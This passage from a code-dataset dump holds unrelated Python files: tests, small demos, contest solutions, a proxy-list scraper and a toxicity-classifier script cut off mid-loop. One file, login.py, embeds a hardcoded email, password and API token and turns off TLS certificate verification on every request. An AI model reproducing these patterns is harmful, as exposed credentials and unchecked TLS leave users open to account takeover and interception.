0)\n        assert_equals(page.procedure, self.test_procedure1)\n        assert_not_equals(page.last_modified, None)\n        assert_not_equals(page.created, None)\n\n    @raises(IntegrityError)\n    def test_display_index_none(self):\n        Page.objects.create(\n            display_index=None,\n            procedure=self.test_procedure1\n        )\n\n    @raises(IntegrityError)\n    def test_procedure_none(self):\n        Page.objects.create(\n            display_index=0\n        )\n\n    @nottest\n    @raises(IntegrityError)\n    def test_display_index_uniqueness(self):\n        Page.objects.create(\n            display_index=0,\n            procedure=self.test_procedure1\n        )\n\n        Page.objects.create(\n            display_index=0,\n            procedure=self.test_procedure1\n        )\n\n    def test_updates_last_modified(self):\n        page = factories.PageFactory()\n        original_last_modified = page.last_modified\n\n        factories.ElementFactory(\n            page=page\n        )\n\n        assert_true(original_last_modified < page.last_modified)\n","sub_path":"src-backend/api/tests/test_model_page.py","file_name":"test_model_page.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"418461206","text":"# Basic interpreter\n\nimport os\nimport subprocess\nfrom parse import *\nfrom analyze import analyze_command\nimport importlib\n\ndef prepare_cmd():\n\t# Prepares console\n\tos.system(\"@echo off\")\n\tos.system(\"cls\")\n\ndef get_current_directory():\n\t# Get the current directory (to be displayed before user input field)\n\tos.system(\"cd>current_cd\")\n\tf = open(\"current_cd\", \"r\")\n\tcd = \"\"\n\tfor line in f:\n\t\tif not line == \"\":\n\t\t\tcd = line\n\treturn cd\n\ndef get_commands_loop():\n\t# Interpreter loop\n\tcommand = input(get_current_directory().strip() + \": \")\n\tparsed_command = parse_command(command)\n\t# Returns true if this is a valid ELang command\n\tif analyze_command(parsed_command):\n\t\t# lang_dict.txt contains comma-separated-values in the style (command,program_name)\n\t\tprogram_name = match_command(parsed_command)\n\t\tinterpret(parsed_command, program_name)\n\t\tget_commands_loop()\n\telse:\n\t\tprint(\"*ERROR: Command \" + command + \" was not found!*\")\n\ndef interpret(command, program_name):\n\t# Import the handler module by name and call its entry point\n\tmodule = importlib.import_module(program_name)\n\tmodule.main_functionality(command)\n\nprepare_cmd()\nget_commands_loop()","sub_path":"interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"477104223","text":"from tkinter import *\n\nroot = Tk()\nscrollbar = Scrollbar(root)\nscrollbar.pack(side = RIGHT, fill = Y)\ntext = Text(root, height=20, width = 50)\n\ntext.pack(side = LEFT, fill = BOTH)\nscrollbar.config(command = text.yview)\ndata = \"\"\"slkadfj aldkfj\nasdlfkj\nadflkj\ndsfkj\nkdzlkcxv\noieu\n1283uas\n049ulkjha\nadfkhkjxhzv\nadflkjhp09u\"\"\"\ntext.insert(END, data)\ndef wt():\n    text.insert(END, \"button\\n\")\n\nb = Button(root,text='test',command = wt)\nb.pack()\nroot.mainloop()\n","sub_path":"scrollbar2.py","file_name":"scrollbar2.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"22119070","text":"import simulator\nfrom simulator.simulator import Simulator\n\nclass Simulation:\n\n    def __init__(self):\n        self.nodes = []\n        self.node_conversion = {}\n\n\n    def add_node(self, node):\n        build = node.build()\n        self.node_conversion[node] = build\n        self.nodes.append(build)\n        return self\n\n\n    def add_road(self, road):\n        build = road.build()\n\n        # Link the start\n        start_build = self.node_conversion[road.start]\n        simulator.link(start_build, build[0])\n        # Link the end\n        end_build = self.node_conversion[road.end]\n        simulator.link(build[-1], end_build)\n\n        self.nodes.remove(end_build)\n        self.nodes.extend(build)\n        self.nodes.append(end_build)\n        return self\n\n\n    def add_path(self, path):\n        node = self.node_conversion[path.departure]\n        directions = [0] * (path.departure.possible_destinations[path.junctions[0]][1] + 1)\n        for i in range(len(path.junctions) - 1):\n            index, length = path.junctions[i].possible_destinations[path.junctions[i + 1]]\n            directions.append(index)\n            directions.extend([0] * length)\n        total_proportion = max(node.paths.keys()) if len(node.paths) >= 1 else 0\n        node.paths[total_proportion + path.proportion] = simulator.Path(directions)\n\n\n    def run_for(self, ticks):\n        s = Simulator(self.nodes)\n        s.run(ticks)\n\n    def run_graphical_for(self, ticks):\n        s = Simulator(self.nodes)\n        s.run_graphical(ticks)\n","sub_path":"modeler/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"332844845","text":"n = int(input())\nL = list(map(int, input().split()))\nL.sort()\nans = 0\n\nsets = set()\nfor i in range(n):\n    l = L[i]\n    for j in L[i+1:]:\n        sets.add((l, j))\n\nTFline = [False for i in range(10**3 + 1)]\nNumline = [0 for i in range(10**3 + 1)]\nfor l in L:\n    TFline[l] = True\n    if Numline[l] < 3:\n        Numline[l] += 1\n\nTNumLine = [0]\nfor i in range(1, 10**3 + 1):\n    TNumLine.append(TNumLine[-1] + 1 if TFline[i] else TNumLine[-1])\n\nfor lines in sets:\n    minline = min(lines)\n    maxline = max(lines)\n    if not abs(minline - maxline):\n        if Numline[minline] == 3:\n            ans += 1\n        ans += TNumLine[minline-1] - TNumLine[min(abs(minline - maxline), minline-1)]\n    else:\n        if Numline[minline] >= 2 and abs(minline - maxline) + minline > maxline:\n            ans += 1\n        ans += TNumLine[minline-1] - TNumLine[min(abs(minline - maxline), minline-1)]\n    
\nprint(ans)\n","sub_path":"contest/abc143/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"237959641","text":"#Encoding:UTF-8\n#Author: Paola Castillo Nacif\n#Description: The program shows the discount applied when buying a given number of software packages\n\ndef calcularNeg(paq):\n    mensaje=\"\"\n    if paq<0:\n        mensaje=\"error\"\n    else:\n        mensaje=\"\"\n    return mensaje\n\ndef calcularDesc(paq):\n    if paq>=0 and paq<10:\n        desc=0\n    elif paq>=10 and paq<=19:\n        desc=(paq*1500)*0.20\n    elif paq>=20 and paq<=49:\n        desc=(paq*1500)*0.30\n    elif paq>=50 and paq<=99:\n        desc=(paq*1500)*0.40\n    elif paq>=100:\n        desc=(paq*1500)*0.50\n    return desc\n\ndef calcularCosto(paq):\n    if paq>=0 and paq<10:\n        costo=(paq*1500)\n    elif paq>=10 and paq<=19:\n        costo=(paq*1500)-((paq*1500)*0.20)\n    elif paq>=20 and paq<=49:\n        costo=(paq*1500)-((paq*1500)*0.30)\n    elif paq>=50 and paq<=99:\n        costo=(paq*1500)-((paq*1500)*0.40)\n    elif paq>=100:\n        costo=(paq*1500)-((paq*1500)*0.50)\n    return costo\n\n    \ndef main():\n    paq=int(input(\"Enter the number of software packages to buy\"))\n    errorn=calcularNeg(paq)\n    desc=calcularDesc(paq)\n    totalp=calcularCosto(paq)\n    print(errorn)\n    print(\"Your discount is:\",\"$\",\"%.2f\"%desc)\n    print(\"Your total is:\",\"$\",\"%.2f\"%totalp)\nmain()\n    ","sub_path":"VentaDeSoftware.py","file_name":"VentaDeSoftware.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"531056275","text":"from django.contrib import admin\n\nfrom ega.models import (\n    EgaUser,\n    League,\n    LeagueMember,\n    Match,\n    Prediction,\n    Team,\n    TeamStats,\n    Tournament,\n)\n\n\nclass LeagueMemberInline(admin.TabularInline):\n    model = LeagueMember\n    extra = 0\n\n\nclass LeagueAdmin(admin.ModelAdmin):\n    list_display = ('name', 'slug')\n    inlines = [LeagueMemberInline]\n\n\nclass TeamAdmin(admin.ModelAdmin):\n    prepopulated_fields = dict(slug=('name',))\n\n\nclass MatchAdmin(admin.ModelAdmin):\n    list_filter = ('tournament', 'when')\n\n\nclass TournamentAdmin(admin.ModelAdmin):\n    filter_horizontal = ('teams',)\n    prepopulated_fields = dict(slug=('name',))\n\n\nadmin.site.register(EgaUser)\nadmin.site.register(League, LeagueAdmin)\nadmin.site.register(Match, MatchAdmin)\nadmin.site.register(Prediction)\nadmin.site.register(Team, TeamAdmin)\nadmin.site.register(TeamStats)\nadmin.site.register(Tournament, TournamentAdmin)\n","sub_path":"ega/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"219304398","text":"import turtle\nimport random\nturtle.shape(\"triangle\")\nturtle.hideturtle()\nturtle.forward(0)\nturtle.speed(0)\nx = 2\na = 13\n\nfor i in range(1, 2000):\n\n    turtle.forward(x)\n    turtle.left(a)\n    turtle.forward(x-random.randint(1, 16))\n    turtle.left(a+(random.randint(-15, 15)))\n    x = (x + 1)/5\n\n\n\n\n\nturtle.exitonclick()\n","sub_path":"PycharmProjects/pythonProject0001/lesson0005.py","file_name":"lesson0005.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"29891588","text":"__author__ = 'liuWei'\n\nimport requests\n\nclass login:\n\n    header = {\n        \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n        \"Accept-Encoding\": \"gzip, deflate, br\",\n        
\"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"33\",\n \"Content-Type\": '',\n \"Cookie\": '',\n \"Host\": \"www.qcourse.com\",\n \"Origin\": \"https://www.qcourse.com\",\n \"Referer\": \"https://www.qcourse.com/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\"\n }\n\n cookie = ''\n\n def getVerifyCode():\n param = {'param': '1417053870@qq.com', 'wmax': '130'}\n\n url = 'https://www.qcourse.com/user/get-verify-code'\n\n r = requests.get(url, params=param, verify=False)\n\n code = r.json()['data']['code']\n\n login.cookie = r.cookies\n\n # RequestsCookieJar 转 json\n ck_dict = requests.utils.dict_from_cookiejar(login.cookie)\n\n print(ck_dict)\n\n headers = r.headers\n\n login.header['Content-Type'] = headers['Content-Type']\n login.header['Cookie'] = 'PHPSESSID=' + ck_dict['PHPSESSID']\n\n print(headers)\n\n data = {\n 'code': code\n }\n\n return data\n\n # print(json.loads(Data))\n\n\n def toLogin():\n # 邮箱登录\n\n data = login.getVerifyCode()\n\n param = {'type': '1', 'email': '1417053870@qq.com', 'password': '123456', 'checkcode': data['code']}\n\n url = 'https://www.qcourse.com/user/login'\n\n print(login.header)\n\n r = requests.post(url, params = param, verify = False)\n\n Data = r.json()\n\n print('====')\n print(Data)\n\n def user():\n # 登录状态\n\n param = {'uid': '100000052', 'token': 'NDY5YTc0NJYyZTBlNZAyMThLNmUzYME5NzJhNzI1Zjc='}\n\n url = 'https://api.qcourse.com/login'\n\n r = requests.post(url, params=param, verify=False)\n\n Data = r.cookies\n\n print(type(Data))\n\n # RequestsCookieJar 转 json\n ck_dict = requests.utils.dict_from_cookiejar(Data)\n\n print(ck_dict)\n\n # json 转 RequestsCookieJar\n # ck_jar = requests.utils.cookiejar_from_dict(ck_dict)\n #\n # print(ck_jar)\n\n\n def info():\n # 用户信息\n\n param = {}\n\n url = 'https://www.qcourse.com/user/info'\n\n r = requests.post(url, params=param, verify=False)\n\n Data = r.json()\n\n print(Data)\n\n\n\n","sub_path":"python/www.qcourse.com/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221227669","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@File : proxy_spider.py\n@Software : DeepTesting\n@Time : 2018/5/18 5:38\n@Author : yubb\n\"\"\"\nimport scrapy\nfrom crawler.items import ProxyItem\nfrom crawler.spiders import USER_AGENT\n\n\nclass ProxySpider(scrapy.Spider):\n\n name = 'proxy'\n url = 'http://www.xicidaili.com/nn/'\n\n def start_requests(self):\n yield scrapy.Request(url=self.url, headers={'User-Agent': USER_AGENT})\n\n def parse(self, response):\n countries = response.css('td img::attr(alt)').extract()\n ips = response.css('#ip_list tr td:nth-child(2)::text').extract()\n ports = response.css('#ip_list tr td:nth-child(3)::text').extract()\n addrs = response.css('#ip_list tr td:nth-child(4) a::text').extract()\n anonymes = response.css('#ip_list tr td:nth-child(5)::text').extract()\n types = response.css('#ip_list tr td:nth-child(6)::text').extract()\n speeds = response.css('#ip_list tr td:nth-child(7) div::attr(title)').extract()\n link_speeds = response.css('#ip_list tr td:nth-child(8) div::attr(title)').extract()\n alive_times = response.css('#ip_list tr td:nth-child(9)::text').extract()\n check_times = response.css('#ip_list tr td:nth-child(10)::text').extract()\n for idx in range(len(countries)):\n item = ProxyItem()\n item['country'] = countries[idx]\n 
item['ip'] = ips[idx]\n            item['port'] = ports[idx]\n            item['addr'] = addrs[idx]\n            item['anonym'] = anonymes[idx]\n            item['type'] = types[idx]\n            item['speed'] = speeds[idx]\n            item['link_speed'] = link_speeds[idx]\n            item['alive_time'] = alive_times[idx]\n            item['check_time'] = check_times[idx]\n            yield item\n\n","sub_path":"src/crawler/spiders/proxy_spider.py","file_name":"proxy_spider.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"549940946","text":"from datetime import datetime\n\nclass TimeLog:\n    def __init__(self, time, message):\n        self.timestamp = datetime.strptime(time, \"%Y-%m-%d %H:%M:%S\")\n        self.message = message.rstrip()\n\n    def get_id(self):\n        tmp = self.message.split()\n        return int(tmp[1][1:])\n\nclass GuardLog:\n    def __init__(self, id):\n        self.id = id\n        self.sleepy_time = 0\n        self.sleep_tracker = [0] * 60\n    \n    def most_sleepy_min(self):\n        max_min = 0\n        max_min_val = self.sleep_tracker[0]\n        for ii in range(1,60):\n            if self.sleep_tracker[ii] > max_min_val:\n                max_min = ii\n                max_min_val = self.sleep_tracker[ii]\n        return max_min, max_min_val\n\n    def pprint(self):\n        print(\"{} - slept {} - most sleepy at {} minute mark\".format(self.id, self.sleepy_time, self.most_sleepy_min()))\n        # print(self.sleep_tracker)\n\nguard_list = {}\ntime_log = list()\n\nwith open(\"./inputs/day4.txt\", \"r\") as f:\n    for line in f:\n        time_log.append(TimeLog(line[1:17]+\":00\" , line[19:]))\n\ntime_log.sort(key=lambda x: x.timestamp)\n\ncurrent_guard = \"#?\"\ncurrent_sleep_min = 0\n\nfor log in time_log:\n    if log.message.startswith(\"Guard\"):\n        current_guard = log.get_id()\n        if current_guard not in guard_list:\n            guard_list[current_guard] = GuardLog(current_guard)\n    elif log.message == \"falls asleep\":\n        current_sleep_min = log.timestamp.minute\n    elif log.message == \"wakes up\":\n        guard_list[current_guard].sleepy_time += log.timestamp.minute - current_sleep_min\n        for ii in range(current_sleep_min, log.timestamp.minute):\n            guard_list[current_guard].sleep_tracker[ii] += 1 \n\n#part 1\nmax_sleepy_time = 0\nmax_min = 0\nmax_msm_count = 0\n\nfor key, guard in guard_list.items():\n    if guard.sleepy_time > max_sleepy_time:\n        sleepiest_guard = guard\n        max_sleepy_time = guard.sleepy_time\n    \n    msm, msm_count = guard.most_sleepy_min()\n    if msm_count > max_msm_count:\n        sleepiest_min_guard = guard\n        max_msm_count = msm_count\n        max_min = msm\n\nmsm, msm_count = sleepiest_guard.most_sleepy_min()\nprint(\"part 1 answer = {}\".format(sleepiest_guard.id * msm))\nprint(\"part 2 answer = {}\".format(sleepiest_min_guard.id * max_min))","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"337444916","text":"# Refresh the current page\nfrom selenium import webdriver\nimport unittest,time\n\nclass refreshPageByChrome(unittest.TestCase):\n\n    def setUp(self):\n        self.driver = webdriver.Chrome(executable_path=r'D:\\pycharm\\chromedriver.exe')\n    \n    def test_refrshCurrentPage(self):\n        url = \"http://www.baidu.com\"\n        self.driver.get(url)\n        self.driver.maximize_window()\n        # Refresh the current page\n        self.driver.refresh()\n        time.sleep(3)\n    \n    def tearDown(self):\n        self.driver.quit()\n    \nif __name__ == '__main__':\n    
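# Entry point: run the refresh test above through the unittest runner.\n    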
unittest.main()","sub_path":"WebDriverAPI/02refreshCurrenPageTest.py","file_name":"02refreshCurrenPageTest.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"427149384","text":"#-*- coding: utf-8 -*-\n# @Time : 2018/9/13 0013 16:49\n# @Author : zhyipeng\n# @File : __init__.py.py\n\nfrom .user import user\nfrom .main import main\n\nBLUEPRINTS = (\n    (user, '/user'),\n    (main, '')\n)\n\n\ndef blueprint_config(app):\n    '''\n    Blueprint configuration\n    :param app: the application instance\n    :return: None\n    '''\n    for blueprint, prefix in BLUEPRINTS:\n        app.register_blueprint(blueprint, url_prefix=prefix)","sub_path":"APP/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"396856173","text":"import logging\r\nfrom collections.abc import Mapping\r\nfrom typing import Dict\r\n\r\nfrom ..node_ports_common import exceptions\r\nfrom ._schema_item import SchemaItem\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\nclass SchemaItemsList(Mapping):\r\n    def __init__(self, data: Dict[str, SchemaItem] = None):\r\n        log.debug(\"creating SchemaItemsList with %s\", data)\r\n        if not data:\r\n            data = {}\r\n        self._store = data\r\n\r\n    def __getitem__(self, key) -> SchemaItem:\r\n        if isinstance(key, int):\r\n            if key < len(self._store):\r\n                key = list(self._store.keys())[key]\r\n        if not key in self._store:\r\n            raise exceptions.UnboundPortError(key)\r\n        return self._store[key]\r\n\r\n    def __iter__(self):\r\n        return iter(self._store)\r\n\r\n    def __len__(self):\r\n        return len(self._store)\r\n","sub_path":"packages/simcore-sdk/src/simcore_sdk/node_ports/_schema_items_list.py","file_name":"_schema_items_list.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"3647921","text":"'''\nAuthor: Allanxu\nDate: 2021-04-12 14:33:13\nLastEditors: Allanxu\nLastEditTime: 2021-04-16 14:44:18\nDescription: ---\n'''\nfrom scipy.io import loadmat\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nimport time\nfrom collections import defaultdict\nimport datatools as dt\nimport PCA_eval as pca \n\n\n\ndef accuracy(label,pred_result):\n    pred_result = np.argmax(pred_result,axis=1)\n    if len(label) != len(pred_result):\n        return False\n    count = 0\n    for i in range(len(label)):\n        if label[i] == pred_result[i]:\n            count+=1 \n    return count/len(label)\n\n\n\nif __name__ == \"__main__\": \n\n    \n    main_dir = r\"C:\\Users\\Allan\\Desktop\\AIS\\Bigdata\\COMP7930_Final_Project\"\n    data_dir = r\"\\Data\"\n    out_dir =r\"\\outfiles\\LogisR\"\n    DBs=defaultdict(list)\n    DBs['Ya64'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n    DBs['Ya32'] = ['5Train','10Train','20Train','30Train','40Train','50Train']\n    DBs['ORL64'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n    DBs['ORL32'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n\n    # raw data loading\n    X_Ya64,Y_Ya64 = dt.Load_RawData(main_dir+data_dir+r'\\Yale_64x64.mat')\n    X_Ya32,Y_Ya32 = dt.Load_RawData(main_dir+data_dir+r'\\YaleB_32x32.mat')\n    X_ORL64,Y_ORL64 = dt.Load_RawData(main_dir+data_dir+r'\\ORL_64x64.mat')\n    X_ORL32,Y_ORL32 = dt.Load_RawData(main_dir+data_dir+r'\\ORL_32x32.mat')\n\n\n    PCs = {'Ya64':105,'Ya32':714,'ORL64':220,'ORL32':203}\n    #count =0 # for debug\n    for i in DBs.keys(): # different Data\n        loss_arr = []\n        for j in DBs[i]: # 
different splited proportion\n print(\"DB:%s, Set:%s\" % (i,j))\n #for k in range(50): # randomly splits\n #print(main_dir+data_dir+ \"\\\\\"+ i+\"\\\\\"+ j +\"\\\\\" + str(k+1) + '.mat')\n splited_ind = loadmat(main_dir+data_dir+ \"\\\\\"+ i+\"\\\\\"+ j +\"\\\\\" + str(1) + '.mat')\n ind_train = splited_ind['trainIdx'].squeeze()\n ind_test = splited_ind['testIdx'].squeeze()\n if i=='Ya64':\n train,train_y,test,test_y = dt.SetsSplit(X_Ya64,Y_Ya64,ind_train,ind_test)\n elif i=='Ya32':\n train,train_y,test,test_y = dt.SetsSplit(X_Ya32,Y_Ya32,ind_train,ind_test)\n elif i=='ORL64':\n train,train_y,test,test_y = dt.SetsSplit(X_ORL64,Y_ORL64,ind_train,ind_test)\n elif i=='ORL32':\n train,train_y,test,test_y = dt.SetsSplit(X_ORL32,Y_ORL32,ind_train,ind_test)\n else:\n print('data error')\n\n # PCA\n DimRedu = pca.xu_PCA()\n eigenvalues,eigenvectors,sub = DimRedu.PCA(train,PCs[i])\n\n # Logistic regression model\n lr_clf = LogisticRegression(random_state=None, solver='lbfgs',multi_class='auto', verbose = 1,max_iter=10000)\n lr_clf.fit(sub, train_y.reshape(1,-1)[0])\n\n # train prediction loss\n train_pred = lr_clf.predict_proba(sub)\n label_train = train_y.squeeze() - 1\n print('Classfication accuracy with PCA:',accuracy(label_train,train_pred))\n\n # test pca\n sub_test = (test/255.0)@ eigenvectors[:,:PCs[i]]\n test_pred = lr_clf.predict_proba(sub_test)\n # tese prediction loss\n label_test = test_y.squeeze() - 1\n test_acc = accuracy(label_test,test_pred)\n print('Classfication accuracy with PCA:',test_acc)\n loss_arr.append(test_acc)\n \n #for debug\n # count+=1\n # if count>1:\n # break\n\n outfile = open(main_dir+out_dir+'\\\\'+ i +'_acc','w')\n for k in range(len(loss_arr)):\n outfile.write(str(loss_arr[k])+'\\n')\n outfile.close() \n #break # for debug\n ","sub_path":"code/LogisR_eval.py","file_name":"LogisR_eval.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556256899","text":"class constants(object):\n \n local_path = '/home/lattice/data/Experiments.dir/BranchingRatio.dir/2013Mar20.dir/2018_08.dir/'\n local_timetag_file = '00001 - Timetags 2013Mar20_2018_08.csv'\n datavault_dir = ['Experiments','BranchingRatio','2013Mar20','2018_08']\n ion_number = 13.0\n \n timetag_np_file = local_timetag_file[:-4] + '.npy'\n bin_filename = timetag_np_file[:-4] + '_binned.npy'\n \n ","sub_path":"scripts/archive/branching_ratio/data_analysis/2013Mar21/2018_08_secondhalf/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447437653","text":"\"\"\"\nGiven a cell with \"it's a fib sequence\" from slideshow,\n please write function \"check_fib\", which accepts a Sequence of integers, and\n returns if the given sequence is a Fibonacci sequence\n\nWe guarantee, that the given sequence contain >= 0 integers inside.\n\n\"\"\"\nfrom math import sqrt\nfrom typing import Sequence\n\n\ndef check_fibonacci(data: Sequence[int]) -> bool:\n \"\"\"Checking if sequence given is a fibonacci sequence\"\"\"\n\n # checking if the first number in sequence is fibonacci number -\n # function returns \"False\" if it's not:\n if not data[0] == 0:\n if not (\n sqrt(5 * (data[0] ** 2) - 4) % 1 == 0\n or sqrt(5 * (data[0] ** 2) + 4) % 1 == 0\n ):\n return False\n # checking if the second number in sequence is fibonacci number -\n # function returns \"False\" if it's not:\n if not (\n sqrt(5 * (data[1] 
** 2) - 4) % 1 == 0 or sqrt(5 * (data[1] ** 2) + 4) % 1 == 0\n    ):\n        return False\n    # checking if a sequence given is fibonacci sequence\n    index = 0\n    while index < len(data) - 2:\n        if data[index] + data[index + 1] == data[index + 2]:\n            index += 1\n        else:\n            return False\n    return True\n","sub_path":"homework1/task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"522744343","text":"\"\"\"\n@version: 1\n@author: zyb\n@site: \n@software: PyCharm Community Edition\n@file: heapTest.py\n@time: 2017/3/13 16:13\n\"\"\"\n\"\"\"\nHeap sort on an array of n elements.\nIn the initial array, every index from len//2 onward is a leaf, and each leaf can be seen as a single-node heap. Working backwards from the first non-leaf node, compare each node with its left and right children and adjust, so the initial array becomes a max-heap. Then loop from 1 to len-1: swap the first element with the last one (the last is now the maximum) and re-heapify elements 1 to len-2 into a max-heap.\n\"\"\"\ndef swap(arr,i,j):\n    temp=arr[i]\n    arr[i]=arr[j]\n    arr[j]=temp\n\n'''\nSift node i down so that the tree rooted at i is a max-heap\n'''\ndef max_heapify(arr,i,heap_size):\n    left=i*2+1\n    right=i*2+2\n    largest=i\n    if left<heap_size and arr[left]>arr[largest]:\n        largest=left\n    if right<heap_size and arr[right]>arr[largest]:\n        largest=right\n    if largest!=i:\n        swap(arr,largest,i)\n        max_heapify(arr,largest,heap_size)\n\n\n'''\nBuild a max-heap from the array, heapifying from the last non-leaf node (len/2-1) down to i==0\n'''\ndef build_max_heap(arr,len):\n    mid=len//2\n    i=mid-1\n    heap_size=len\n    while i>=0:\n        #print(i)\n        max_heapify(arr,i,len)\n        #print(arr)\n        i=i-1\n\n\ndef heap_sorted(arr,len):\n    build_max_heap(arr,len)\n    remind=len-1\n    while remind>=1:\n        swap(arr,0,remind)\n        max_heapify(arr, 0, remind)\n        remind = remind - 1\n\n\n\nif __name__==\"__main__\":\n    arr = [ 39, 55, 3, 28, 83, 35,56]\n    length=len(arr)\n    #build_max_heap(arr,length)\n    heap_sorted(arr,length)\n    print(arr)","sub_path":"heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"201841687","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, classification_report\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom sklearn_pandas import DataFrameMapper\nimport algorithms\nimport data_cleaner\n\nclass STRUDEL_MODEL:\n    def __init__(self, X_train, Y_train):\n        self.vectorizer = TfidfVectorizer(analyzer='word', token_pattern=r'\\w{1,}', ngram_range=(1,1),max_features=5000)\n\n        self.mapper = None\n        self.Y = None\n        self.X = None\n\n        self.clf = algorithms.linear_svm_model()\n        self.__prepare_data(X_train, Y_train)\n        self.model=self.train()\n\n\n    def __prepare_data(self, X_train, Y_train):\n        self.mapper = DataFrameMapper([\n            ('text', self.vectorizer),\n            ('num_url', None),\n            ('num_emoji', None),\n            ('num_mention', None),\n            ('nltk_score', None),\n            ('subjectivity', None),\n            ('polarity', None),\n            ('perspective_score', None),\n            ('stanford_polite', None),\n        ])\n        self.Y = np.ravel(Y_train)\n\n        self.X = self.mapper.fit_transform(X_train) # adding the other features with bagofwords\n\n    def train(self):\n        print(\"Training the model with \" + str(len(self.Y)) + \" instances and \" + str(\n            self.X.shape[1]) + \" features\")\n        self.clf.fit(self.X, self.Y)\n        print(\"Model training complete ..\")\n        return self.clf\n\n    def predict(self, X_test):\n        X_test_mapped = self.mapper.transform(X_test)\n        predictions = self.model.predict(X_test_mapped)\n        return np.expand_dims(predictions, 1)\n\n\ndef read_dataframe_from_excel(file):\n    dataframe = pd.read_excel(file)\n    return dataframe\n\nprint(\"Reading dataset..\")\n#training_data = 
read_dataframe_from_excel(\"models/code_review_preprocessed.xlsx\")\ntraining_data = read_dataframe_from_excel(\"models/STRUDEL-issue-comments-dataset.xlsx\")\n\nprint(\"Applying SE domain specific cleaning steps..\")\ntraining_data[\"text\"] = training_data.text.astype(str).apply(data_cleaner.clean_text)\n\nkf = StratifiedKFold(n_splits=10, shuffle=True, random_state=999)\n\nfilename = \"results/strudel-CV-issue-comments.csv\"\n#filename = \"results/strudel-CV-code-review.csv\"\ntraining_log = open(filename, 'w')\ntraining_log.write(\"Fold,precision_0,recall_0,f-score_0,precision_1,recall_1,f-score_1,accuracy\\n\")\n\ncount =1\nresults=\"\"\nprint(\"Starting 10-fold cross validations..\")\nfor train_index, test_index in kf.split(training_data, training_data[\"is_toxic\"]):\n\n X_train, X_test = training_data.loc[train_index, [\"text\", \"perspective_score\",\t\"num_url\",\n \"num_emoji\",\t\"num_mention\",\t\"nltk_score\", \"num_reference\",\n \"subjectivity\",\t\"polarity\",\t\"stanford_polite\"]], \\\n training_data.loc[test_index, [\"text\", \"perspective_score\",\t\"num_url\",\n \"num_emoji\",\t\"num_mention\",\t\"nltk_score\", \"num_reference\",\n \"subjectivity\",\t\"polarity\",\t\"stanford_polite\"]]\n\n Y_train, Y_test = training_data.loc[train_index, \"is_toxic\"], training_data.loc[test_index, \"is_toxic\"]\n\n print(\"Fold# \"+ str(count))\n classifier_model = STRUDEL_MODEL(X_train, Y_train)\n\n predictions = classifier_model.predict(X_test)\n\n precision_1 = precision_score(Y_test, predictions, pos_label=1)\n recall_1 = recall_score(Y_test, predictions, pos_label=1)\n f1score_1 = f1_score(Y_test, predictions, pos_label=1)\n\n precision_0 = precision_score(Y_test, predictions, pos_label=0)\n recall_0 = recall_score(Y_test, predictions, pos_label=0)\n f1score_0 = f1_score(Y_test, predictions, pos_label=0)\n accuracy = accuracy_score(Y_test, predictions)\n 